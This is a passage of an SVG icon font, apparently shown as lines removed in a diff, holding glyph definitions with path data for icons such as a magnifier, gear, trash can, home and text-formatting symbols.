-<glyph unicode="&#xf00e;" horiz-adv-x="1664" d="M1024 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-224v-224q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v224h-224q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h224v224q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5v-224h224 q13 0 22.5 -9.5t9.5 -22.5zM1152 704q0 185 -131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5t316.5 131.5t131.5 316.5zM1664 -128q0 -53 -37.5 -90.5t-90.5 -37.5q-54 0 -90 38l-343 342q-179 -124 -399 -124q-143 0 -273.5 55.5 t-225 150t-150 225t-55.5 273.5t55.5 273.5t150 225t225 150t273.5 55.5t273.5 -55.5t225 -150t150 -225t55.5 -273.5q0 -220 -124 -399l343 -343q37 -37 37 -90z" />
-<glyph unicode="&#xf010;" horiz-adv-x="1664" d="M1024 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-576q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h576q13 0 22.5 -9.5t9.5 -22.5zM1152 704q0 185 -131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5t316.5 131.5t131.5 316.5z M1664 -128q0 -53 -37.5 -90.5t-90.5 -37.5q-54 0 -90 38l-343 342q-179 -124 -399 -124q-143 0 -273.5 55.5t-225 150t-150 225t-55.5 273.5t55.5 273.5t150 225t225 150t273.5 55.5t273.5 -55.5t225 -150t150 -225t55.5 -273.5q0 -220 -124 -399l343 -343q37 -37 37 -90z " />
-<glyph unicode="&#xf011;" d="M1536 640q0 -156 -61 -298t-164 -245t-245 -164t-298 -61t-298 61t-245 164t-164 245t-61 298q0 182 80.5 343t226.5 270q43 32 95.5 25t83.5 -50q32 -42 24.5 -94.5t-49.5 -84.5q-98 -74 -151.5 -181t-53.5 -228q0 -104 40.5 -198.5t109.5 -163.5t163.5 -109.5 t198.5 -40.5t198.5 40.5t163.5 109.5t109.5 163.5t40.5 198.5q0 121 -53.5 228t-151.5 181q-42 32 -49.5 84.5t24.5 94.5q31 43 84 50t95 -25q146 -109 226.5 -270t80.5 -343zM896 1408v-640q0 -52 -38 -90t-90 -38t-90 38t-38 90v640q0 52 38 90t90 38t90 -38t38 -90z" />
-<glyph unicode="&#xf012;" horiz-adv-x="1792" d="M256 96v-192q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM640 224v-320q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v320q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM1024 480v-576q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23 v576q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM1408 864v-960q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v960q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM1792 1376v-1472q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v1472q0 14 9 23t23 9h192q14 0 23 -9t9 -23z" />
-<glyph unicode="&#xf013;" d="M1024 640q0 106 -75 181t-181 75t-181 -75t-75 -181t75 -181t181 -75t181 75t75 181zM1536 749v-222q0 -12 -8 -23t-20 -13l-185 -28q-19 -54 -39 -91q35 -50 107 -138q10 -12 10 -25t-9 -23q-27 -37 -99 -108t-94 -71q-12 0 -26 9l-138 108q-44 -23 -91 -38 q-16 -136 -29 -186q-7 -28 -36 -28h-222q-14 0 -24.5 8.5t-11.5 21.5l-28 184q-49 16 -90 37l-141 -107q-10 -9 -25 -9q-14 0 -25 11q-126 114 -165 168q-7 10 -7 23q0 12 8 23q15 21 51 66.5t54 70.5q-27 50 -41 99l-183 27q-13 2 -21 12.5t-8 23.5v222q0 12 8 23t19 13 l186 28q14 46 39 92q-40 57 -107 138q-10 12 -10 24q0 10 9 23q26 36 98.5 107.5t94.5 71.5q13 0 26 -10l138 -107q44 23 91 38q16 136 29 186q7 28 36 28h222q14 0 24.5 -8.5t11.5 -21.5l28 -184q49 -16 90 -37l142 107q9 9 24 9q13 0 25 -10q129 -119 165 -170q7 -8 7 -22 q0 -12 -8 -23q-15 -21 -51 -66.5t-54 -70.5q26 -50 41 -98l183 -28q13 -2 21 -12.5t8 -23.5z" />
-<glyph unicode="&#xf014;" horiz-adv-x="1408" d="M512 800v-576q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v576q0 14 9 23t23 9h64q14 0 23 -9t9 -23zM768 800v-576q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v576q0 14 9 23t23 9h64q14 0 23 -9t9 -23zM1024 800v-576q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v576 q0 14 9 23t23 9h64q14 0 23 -9t9 -23zM1152 76v948h-896v-948q0 -22 7 -40.5t14.5 -27t10.5 -8.5h832q3 0 10.5 8.5t14.5 27t7 40.5zM480 1152h448l-48 117q-7 9 -17 11h-317q-10 -2 -17 -11zM1408 1120v-64q0 -14 -9 -23t-23 -9h-96v-948q0 -83 -47 -143.5t-113 -60.5h-832 q-66 0 -113 58.5t-47 141.5v952h-96q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h309l70 167q15 37 54 63t79 26h320q40 0 79 -26t54 -63l70 -167h309q14 0 23 -9t9 -23z" />
-<glyph unicode="&#xf015;" horiz-adv-x="1664" d="M1408 544v-480q0 -26 -19 -45t-45 -19h-384v384h-256v-384h-384q-26 0 -45 19t-19 45v480q0 1 0.5 3t0.5 3l575 474l575 -474q1 -2 1 -6zM1631 613l-62 -74q-8 -9 -21 -11h-3q-13 0 -21 7l-692 577l-692 -577q-12 -8 -24 -7q-13 2 -21 11l-62 74q-8 10 -7 23.5t11 21.5 l719 599q32 26 76 26t76 -26l244 -204v195q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-408l219 -182q10 -8 11 -21.5t-7 -23.5z" />
-<glyph unicode="&#xf016;" horiz-adv-x="1280" d="M128 0h1024v768h-416q-40 0 -68 28t-28 68v416h-512v-1280zM768 896h376q-10 29 -22 41l-313 313q-12 12 -41 22v-376zM1280 864v-896q0 -40 -28 -68t-68 -28h-1088q-40 0 -68 28t-28 68v1344q0 40 28 68t68 28h640q40 0 88 -20t76 -48l312 -312q28 -28 48 -76t20 -88z " />
-<glyph unicode="&#xf017;" d="M896 992v-448q0 -14 -9 -23t-23 -9h-320q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h224v352q0 14 9 23t23 9h64q14 0 23 -9t9 -23zM1312 640q0 148 -73 273t-198 198t-273 73t-273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273zM1536 640 q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf018;" horiz-adv-x="1920" d="M1111 540v4l-24 320q-1 13 -11 22.5t-23 9.5h-186q-13 0 -23 -9.5t-11 -22.5l-24 -320v-4q-1 -12 8 -20t21 -8h244q12 0 21 8t8 20zM1870 73q0 -73 -46 -73h-704q13 0 22 9.5t8 22.5l-20 256q-1 13 -11 22.5t-23 9.5h-272q-13 0 -23 -9.5t-11 -22.5l-20 -256 q-1 -13 8 -22.5t22 -9.5h-704q-46 0 -46 73q0 54 26 116l417 1044q8 19 26 33t38 14h339q-13 0 -23 -9.5t-11 -22.5l-15 -192q-1 -14 8 -23t22 -9h166q13 0 22 9t8 23l-15 192q-1 13 -11 22.5t-23 9.5h339q20 0 38 -14t26 -33l417 -1044q26 -62 26 -116z" />
-<glyph unicode="&#xf019;" horiz-adv-x="1664" d="M1280 192q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1536 192q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1664 416v-320q0 -40 -28 -68t-68 -28h-1472q-40 0 -68 28t-28 68v320q0 40 28 68t68 28h465l135 -136 q58 -56 136 -56t136 56l136 136h464q40 0 68 -28t28 -68zM1339 985q17 -41 -14 -70l-448 -448q-18 -19 -45 -19t-45 19l-448 448q-31 29 -14 70q17 39 59 39h256v448q0 26 19 45t45 19h256q26 0 45 -19t19 -45v-448h256q42 0 59 -39z" />
-<glyph unicode="&#xf01a;" d="M1120 608q0 -12 -10 -24l-319 -319q-11 -9 -23 -9t-23 9l-320 320q-15 16 -7 35q8 20 30 20h192v352q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-352h192q14 0 23 -9t9 -23zM768 1184q-148 0 -273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273 t-73 273t-198 198t-273 73zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf01b;" d="M1118 660q-8 -20 -30 -20h-192v-352q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v352h-192q-14 0 -23 9t-9 23q0 12 10 24l319 319q11 9 23 9t23 -9l320 -320q15 -16 7 -35zM768 1184q-148 0 -273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198 t73 273t-73 273t-198 198t-273 73zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf01c;" d="M1023 576h316q-1 3 -2.5 8t-2.5 8l-212 496h-708l-212 -496q-1 -2 -2.5 -8t-2.5 -8h316l95 -192h320zM1536 546v-482q0 -26 -19 -45t-45 -19h-1408q-26 0 -45 19t-19 45v482q0 62 25 123l238 552q10 25 36.5 42t52.5 17h832q26 0 52.5 -17t36.5 -42l238 -552 q25 -61 25 -123z" />
-<glyph unicode="&#xf01d;" d="M1184 640q0 -37 -32 -55l-544 -320q-15 -9 -32 -9q-16 0 -32 8q-32 19 -32 56v640q0 37 32 56q33 18 64 -1l544 -320q32 -18 32 -55zM1312 640q0 148 -73 273t-198 198t-273 73t-273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273zM1536 640 q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf01e;" d="M1536 1280v-448q0 -26 -19 -45t-45 -19h-448q-42 0 -59 40q-17 39 14 69l138 138q-148 137 -349 137q-104 0 -198.5 -40.5t-163.5 -109.5t-109.5 -163.5t-40.5 -198.5t40.5 -198.5t109.5 -163.5t163.5 -109.5t198.5 -40.5q119 0 225 52t179 147q7 10 23 12q14 0 25 -9 l137 -138q9 -8 9.5 -20.5t-7.5 -22.5q-109 -132 -264 -204.5t-327 -72.5q-156 0 -298 61t-245 164t-164 245t-61 298t61 298t164 245t245 164t298 61q147 0 284.5 -55.5t244.5 -156.5l130 129q29 31 70 14q39 -17 39 -59z" />
-<glyph unicode="&#xf021;" d="M1511 480q0 -5 -1 -7q-64 -268 -268 -434.5t-478 -166.5q-146 0 -282.5 55t-243.5 157l-129 -129q-19 -19 -45 -19t-45 19t-19 45v448q0 26 19 45t45 19h448q26 0 45 -19t19 -45t-19 -45l-137 -137q71 -66 161 -102t187 -36q134 0 250 65t186 179q11 17 53 117 q8 23 30 23h192q13 0 22.5 -9.5t9.5 -22.5zM1536 1280v-448q0 -26 -19 -45t-45 -19h-448q-26 0 -45 19t-19 45t19 45l138 138q-148 137 -349 137q-134 0 -250 -65t-186 -179q-11 -17 -53 -117q-8 -23 -30 -23h-199q-13 0 -22.5 9.5t-9.5 22.5v7q65 268 270 434.5t480 166.5 q146 0 284 -55.5t245 -156.5l130 129q19 19 45 19t45 -19t19 -45z" />
-<glyph unicode="&#xf022;" horiz-adv-x="1792" d="M384 352v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM384 608v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M384 864v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM1536 352v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-960q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h960q13 0 22.5 -9.5t9.5 -22.5z M1536 608v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-960q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h960q13 0 22.5 -9.5t9.5 -22.5zM1536 864v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-960q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h960q13 0 22.5 -9.5 t9.5 -22.5zM1664 160v832q0 13 -9.5 22.5t-22.5 9.5h-1472q-13 0 -22.5 -9.5t-9.5 -22.5v-832q0 -13 9.5 -22.5t22.5 -9.5h1472q13 0 22.5 9.5t9.5 22.5zM1792 1248v-1088q0 -66 -47 -113t-113 -47h-1472q-66 0 -113 47t-47 113v1088q0 66 47 113t113 47h1472q66 0 113 -47 t47 -113z" />
-<glyph unicode="&#xf023;" horiz-adv-x="1152" d="M320 768h512v192q0 106 -75 181t-181 75t-181 -75t-75 -181v-192zM1152 672v-576q0 -40 -28 -68t-68 -28h-960q-40 0 -68 28t-28 68v576q0 40 28 68t68 28h32v192q0 184 132 316t316 132t316 -132t132 -316v-192h32q40 0 68 -28t28 -68z" />
-<glyph unicode="&#xf024;" horiz-adv-x="1792" d="M320 1280q0 -72 -64 -110v-1266q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v1266q-64 38 -64 110q0 53 37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1792 1216v-763q0 -25 -12.5 -38.5t-39.5 -27.5q-215 -116 -369 -116q-61 0 -123.5 22t-108.5 48 t-115.5 48t-142.5 22q-192 0 -464 -146q-17 -9 -33 -9q-26 0 -45 19t-19 45v742q0 32 31 55q21 14 79 43q236 120 421 120q107 0 200 -29t219 -88q38 -19 88 -19q54 0 117.5 21t110 47t88 47t54.5 21q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf025;" horiz-adv-x="1664" d="M1664 650q0 -166 -60 -314l-20 -49l-185 -33q-22 -83 -90.5 -136.5t-156.5 -53.5v-32q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v576q0 14 9 23t23 9h64q14 0 23 -9t9 -23v-32q71 0 130 -35.5t93 -95.5l68 12q29 95 29 193q0 148 -88 279t-236.5 209t-315.5 78 t-315.5 -78t-236.5 -209t-88 -279q0 -98 29 -193l68 -12q34 60 93 95.5t130 35.5v32q0 14 9 23t23 9h64q14 0 23 -9t9 -23v-576q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v32q-88 0 -156.5 53.5t-90.5 136.5l-185 33l-20 49q-60 148 -60 314q0 151 67 291t179 242.5 t266 163.5t320 61t320 -61t266 -163.5t179 -242.5t67 -291z" />
-<glyph unicode="&#xf026;" horiz-adv-x="768" d="M768 1184v-1088q0 -26 -19 -45t-45 -19t-45 19l-333 333h-262q-26 0 -45 19t-19 45v384q0 26 19 45t45 19h262l333 333q19 19 45 19t45 -19t19 -45z" />
-<glyph unicode="&#xf027;" horiz-adv-x="1152" d="M768 1184v-1088q0 -26 -19 -45t-45 -19t-45 19l-333 333h-262q-26 0 -45 19t-19 45v384q0 26 19 45t45 19h262l333 333q19 19 45 19t45 -19t19 -45zM1152 640q0 -76 -42.5 -141.5t-112.5 -93.5q-10 -5 -25 -5q-26 0 -45 18.5t-19 45.5q0 21 12 35.5t29 25t34 23t29 35.5 t12 57t-12 57t-29 35.5t-34 23t-29 25t-12 35.5q0 27 19 45.5t45 18.5q15 0 25 -5q70 -27 112.5 -93t42.5 -142z" />
-<glyph unicode="&#xf028;" horiz-adv-x="1664" d="M768 1184v-1088q0 -26 -19 -45t-45 -19t-45 19l-333 333h-262q-26 0 -45 19t-19 45v384q0 26 19 45t45 19h262l333 333q19 19 45 19t45 -19t19 -45zM1152 640q0 -76 -42.5 -141.5t-112.5 -93.5q-10 -5 -25 -5q-26 0 -45 18.5t-19 45.5q0 21 12 35.5t29 25t34 23t29 35.5 t12 57t-12 57t-29 35.5t-34 23t-29 25t-12 35.5q0 27 19 45.5t45 18.5q15 0 25 -5q70 -27 112.5 -93t42.5 -142zM1408 640q0 -153 -85 -282.5t-225 -188.5q-13 -5 -25 -5q-27 0 -46 19t-19 45q0 39 39 59q56 29 76 44q74 54 115.5 135.5t41.5 173.5t-41.5 173.5 t-115.5 135.5q-20 15 -76 44q-39 20 -39 59q0 26 19 45t45 19q13 0 26 -5q140 -59 225 -188.5t85 -282.5zM1664 640q0 -230 -127 -422.5t-338 -283.5q-13 -5 -26 -5q-26 0 -45 19t-19 45q0 36 39 59q7 4 22.5 10.5t22.5 10.5q46 25 82 51q123 91 192 227t69 289t-69 289 t-192 227q-36 26 -82 51q-7 4 -22.5 10.5t-22.5 10.5q-39 23 -39 59q0 26 19 45t45 19q13 0 26 -5q211 -91 338 -283.5t127 -422.5z" />
-<glyph unicode="&#xf029;" horiz-adv-x="1408" d="M384 384v-128h-128v128h128zM384 1152v-128h-128v128h128zM1152 1152v-128h-128v128h128zM128 129h384v383h-384v-383zM128 896h384v384h-384v-384zM896 896h384v384h-384v-384zM640 640v-640h-640v640h640zM1152 128v-128h-128v128h128zM1408 128v-128h-128v128h128z M1408 640v-384h-384v128h-128v-384h-128v640h384v-128h128v128h128zM640 1408v-640h-640v640h640zM1408 1408v-640h-640v640h640z" />
-<glyph unicode="&#xf02a;" horiz-adv-x="1792" d="M63 0h-63v1408h63v-1408zM126 1h-32v1407h32v-1407zM220 1h-31v1407h31v-1407zM377 1h-31v1407h31v-1407zM534 1h-62v1407h62v-1407zM660 1h-31v1407h31v-1407zM723 1h-31v1407h31v-1407zM786 1h-31v1407h31v-1407zM943 1h-63v1407h63v-1407zM1100 1h-63v1407h63v-1407z M1226 1h-63v1407h63v-1407zM1352 1h-63v1407h63v-1407zM1446 1h-63v1407h63v-1407zM1635 1h-94v1407h94v-1407zM1698 1h-32v1407h32v-1407zM1792 0h-63v1408h63v-1408z" />
-<glyph unicode="&#xf02b;" d="M448 1088q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1515 512q0 -53 -37 -90l-491 -492q-39 -37 -91 -37q-53 0 -90 37l-715 716q-38 37 -64.5 101t-26.5 117v416q0 52 38 90t90 38h416q53 0 117 -26.5t102 -64.5 l715 -714q37 -39 37 -91z" />
-<glyph unicode="&#xf02c;" horiz-adv-x="1920" d="M448 1088q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1515 512q0 -53 -37 -90l-491 -492q-39 -37 -91 -37q-53 0 -90 37l-715 716q-38 37 -64.5 101t-26.5 117v416q0 52 38 90t90 38h416q53 0 117 -26.5t102 -64.5 l715 -714q37 -39 37 -91zM1899 512q0 -53 -37 -90l-491 -492q-39 -37 -91 -37q-36 0 -59 14t-53 45l470 470q37 37 37 90q0 52 -37 91l-715 714q-38 38 -102 64.5t-117 26.5h224q53 0 117 -26.5t102 -64.5l715 -714q37 -39 37 -91z" />
-<glyph unicode="&#xf02d;" horiz-adv-x="1664" d="M1639 1058q40 -57 18 -129l-275 -906q-19 -64 -76.5 -107.5t-122.5 -43.5h-923q-77 0 -148.5 53.5t-99.5 131.5q-24 67 -2 127q0 4 3 27t4 37q1 8 -3 21.5t-3 19.5q2 11 8 21t16.5 23.5t16.5 23.5q23 38 45 91.5t30 91.5q3 10 0.5 30t-0.5 28q3 11 17 28t17 23 q21 36 42 92t25 90q1 9 -2.5 32t0.5 28q4 13 22 30.5t22 22.5q19 26 42.5 84.5t27.5 96.5q1 8 -3 25.5t-2 26.5q2 8 9 18t18 23t17 21q8 12 16.5 30.5t15 35t16 36t19.5 32t26.5 23.5t36 11.5t47.5 -5.5l-1 -3q38 9 51 9h761q74 0 114 -56t18 -130l-274 -906 q-36 -119 -71.5 -153.5t-128.5 -34.5h-869q-27 0 -38 -15q-11 -16 -1 -43q24 -70 144 -70h923q29 0 56 15.5t35 41.5l300 987q7 22 5 57q38 -15 59 -43zM575 1056q-4 -13 2 -22.5t20 -9.5h608q13 0 25.5 9.5t16.5 22.5l21 64q4 13 -2 22.5t-20 9.5h-608q-13 0 -25.5 -9.5 t-16.5 -22.5zM492 800q-4 -13 2 -22.5t20 -9.5h608q13 0 25.5 9.5t16.5 22.5l21 64q4 13 -2 22.5t-20 9.5h-608q-13 0 -25.5 -9.5t-16.5 -22.5z" />
-<glyph unicode="&#xf02e;" horiz-adv-x="1280" d="M1164 1408q23 0 44 -9q33 -13 52.5 -41t19.5 -62v-1289q0 -34 -19.5 -62t-52.5 -41q-19 -8 -44 -8q-48 0 -83 32l-441 424l-441 -424q-36 -33 -83 -33q-23 0 -44 9q-33 13 -52.5 41t-19.5 62v1289q0 34 19.5 62t52.5 41q21 9 44 9h1048z" />
-<glyph unicode="&#xf02f;" horiz-adv-x="1664" d="M384 0h896v256h-896v-256zM384 640h896v384h-160q-40 0 -68 28t-28 68v160h-640v-640zM1536 576q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1664 576v-416q0 -13 -9.5 -22.5t-22.5 -9.5h-224v-160q0 -40 -28 -68t-68 -28h-960q-40 0 -68 28t-28 68 v160h-224q-13 0 -22.5 9.5t-9.5 22.5v416q0 79 56.5 135.5t135.5 56.5h64v544q0 40 28 68t68 28h672q40 0 88 -20t76 -48l152 -152q28 -28 48 -76t20 -88v-256h64q79 0 135.5 -56.5t56.5 -135.5z" />
-<glyph unicode="&#xf030;" horiz-adv-x="1920" d="M960 864q119 0 203.5 -84.5t84.5 -203.5t-84.5 -203.5t-203.5 -84.5t-203.5 84.5t-84.5 203.5t84.5 203.5t203.5 84.5zM1664 1280q106 0 181 -75t75 -181v-896q0 -106 -75 -181t-181 -75h-1408q-106 0 -181 75t-75 181v896q0 106 75 181t181 75h224l51 136 q19 49 69.5 84.5t103.5 35.5h512q53 0 103.5 -35.5t69.5 -84.5l51 -136h224zM960 128q185 0 316.5 131.5t131.5 316.5t-131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5z" />
-<glyph unicode="&#xf031;" horiz-adv-x="1664" d="M725 977l-170 -450q73 -1 153.5 -2t119 -1.5t52.5 -0.5l29 2q-32 95 -92 241q-53 132 -92 211zM21 -128h-21l2 79q22 7 80 18q89 16 110 31q20 16 48 68l237 616l280 724h75h53l11 -21l205 -480q103 -242 124 -297q39 -102 96 -235q26 -58 65 -164q24 -67 65 -149 q22 -49 35 -57q22 -19 69 -23q47 -6 103 -27q6 -39 6 -57q0 -14 -1 -26q-80 0 -192 8q-93 8 -189 8q-79 0 -135 -2l-200 -11l-58 -2q0 45 4 78l131 28q56 13 68 23q12 12 12 27t-6 32l-47 114l-92 228l-450 2q-29 -65 -104 -274q-23 -64 -23 -84q0 -31 17 -43 q26 -21 103 -32q3 0 13.5 -2t30 -5t40.5 -6q1 -28 1 -58q0 -17 -2 -27q-66 0 -349 20l-48 -8q-81 -14 -167 -14z" />
-<glyph unicode="&#xf032;" horiz-adv-x="1408" d="M555 15q76 -32 140 -32q131 0 216 41t122 113q38 70 38 181q0 114 -41 180q-58 94 -141 126q-80 32 -247 32q-74 0 -101 -10v-144l-1 -173l3 -270q0 -15 12 -44zM541 761q43 -7 109 -7q175 0 264 65t89 224q0 112 -85 187q-84 75 -255 75q-52 0 -130 -13q0 -44 2 -77 q7 -122 6 -279l-1 -98q0 -43 1 -77zM0 -128l2 94q45 9 68 12q77 12 123 31q17 27 21 51q9 66 9 194l-2 497q-5 256 -9 404q-1 87 -11 109q-1 4 -12 12q-18 12 -69 15q-30 2 -114 13l-4 83l260 6l380 13l45 1q5 0 14 0.5t14 0.5q1 0 21.5 -0.5t40.5 -0.5h74q88 0 191 -27 q43 -13 96 -39q57 -29 102 -76q44 -47 65 -104t21 -122q0 -70 -32 -128t-95 -105q-26 -20 -150 -77q177 -41 267 -146q92 -106 92 -236q0 -76 -29 -161q-21 -62 -71 -117q-66 -72 -140 -108q-73 -36 -203 -60q-82 -15 -198 -11l-197 4q-84 2 -298 -11q-33 -3 -272 -11z" />
-<glyph unicode="&#xf033;" horiz-adv-x="1024" d="M0 -126l17 85q4 1 77 20q76 19 116 39q29 37 41 101l27 139l56 268l12 64q8 44 17 84.5t16 67t12.5 46.5t9 30.5t3.5 11.5l29 157l16 63l22 135l8 50v38q-41 22 -144 28q-28 2 -38 4l19 103l317 -14q39 -2 73 -2q66 0 214 9q33 2 68 4.5t36 2.5q-2 -19 -6 -38 q-7 -29 -13 -51q-55 -19 -109 -31q-64 -16 -101 -31q-12 -31 -24 -88q-9 -44 -13 -82q-44 -199 -66 -306l-61 -311l-38 -158l-43 -235l-12 -45q-2 -7 1 -27q64 -15 119 -21q36 -5 66 -10q-1 -29 -7 -58q-7 -31 -9 -41q-18 0 -23 -1q-24 -2 -42 -2q-9 0 -28 3q-19 4 -145 17 l-198 2q-41 1 -174 -11q-74 -7 -98 -9z" />
-<glyph unicode="&#xf034;" horiz-adv-x="1792" d="M81 1407l54 -27q20 -5 211 -5h130l19 3l115 1l215 -1h293l34 -2q14 -1 28 7t21 16l7 8l42 1q15 0 28 -1v-104.5t1 -131.5l1 -100l-1 -58q0 -32 -4 -51q-39 -15 -68 -18q-25 43 -54 128q-8 24 -15.5 62.5t-11.5 65.5t-6 29q-13 15 -27 19q-7 2 -42.5 2t-103.5 -1t-111 -1 q-34 0 -67 -5q-10 -97 -8 -136l1 -152v-332l3 -359l-1 -147q-1 -46 11 -85q49 -25 89 -32q2 0 18 -5t44 -13t43 -12q30 -8 50 -18q5 -45 5 -50q0 -10 -3 -29q-14 -1 -34 -1q-110 0 -187 10q-72 8 -238 8q-88 0 -233 -14q-48 -4 -70 -4q-2 22 -2 26l-1 26v9q21 33 79 49 q139 38 159 50q9 21 12 56q8 192 6 433l-5 428q-1 62 -0.5 118.5t0.5 102.5t-2 57t-6 15q-6 5 -14 6q-38 6 -148 6q-43 0 -100 -13.5t-73 -24.5q-13 -9 -22 -33t-22 -75t-24 -84q-6 -19 -19.5 -32t-20.5 -13q-44 27 -56 44v297v86zM1744 128q33 0 42 -18.5t-11 -44.5 l-126 -162q-20 -26 -49 -26t-49 26l-126 162q-20 26 -11 44.5t42 18.5h80v1024h-80q-33 0 -42 18.5t11 44.5l126 162q20 26 49 26t49 -26l126 -162q20 -26 11 -44.5t-42 -18.5h-80v-1024h80z" />
-<glyph unicode="&#xf035;" d="M81 1407l54 -27q20 -5 211 -5h130l19 3l115 1l446 -1h318l34 -2q14 -1 28 7t21 16l7 8l42 1q15 0 28 -1v-104.5t1 -131.5l1 -100l-1 -58q0 -32 -4 -51q-39 -15 -68 -18q-25 43 -54 128q-8 24 -15.5 62.5t-11.5 65.5t-6 29q-13 15 -27 19q-7 2 -58.5 2t-138.5 -1t-128 -1 q-94 0 -127 -5q-10 -97 -8 -136l1 -152v52l3 -359l-1 -147q-1 -46 11 -85q49 -25 89 -32q2 0 18 -5t44 -13t43 -12q30 -8 50 -18q5 -45 5 -50q0 -10 -3 -29q-14 -1 -34 -1q-110 0 -187 10q-72 8 -238 8q-82 0 -233 -13q-45 -5 -70 -5q-2 22 -2 26l-1 26v9q21 33 79 49 q139 38 159 50q9 21 12 56q6 137 6 433l-5 44q0 265 -2 278q-2 11 -6 15q-6 5 -14 6q-38 6 -148 6q-50 0 -168.5 -14t-132.5 -24q-13 -9 -22 -33t-22 -75t-24 -84q-6 -19 -19.5 -32t-20.5 -13q-44 27 -56 44v297v86zM1505 113q26 -20 26 -49t-26 -49l-162 -126 q-26 -20 -44.5 -11t-18.5 42v80h-1024v-80q0 -33 -18.5 -42t-44.5 11l-162 126q-26 20 -26 49t26 49l162 126q26 20 44.5 11t18.5 -42v-80h1024v80q0 33 18.5 42t44.5 -11z" />
-<glyph unicode="&#xf036;" horiz-adv-x="1792" d="M1792 192v-128q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1408 576v-128q0 -26 -19 -45t-45 -19h-1280q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1280q26 0 45 -19t19 -45zM1664 960v-128q0 -26 -19 -45 t-45 -19h-1536q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1536q26 0 45 -19t19 -45zM1280 1344v-128q0 -26 -19 -45t-45 -19h-1152q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1152q26 0 45 -19t19 -45z" />
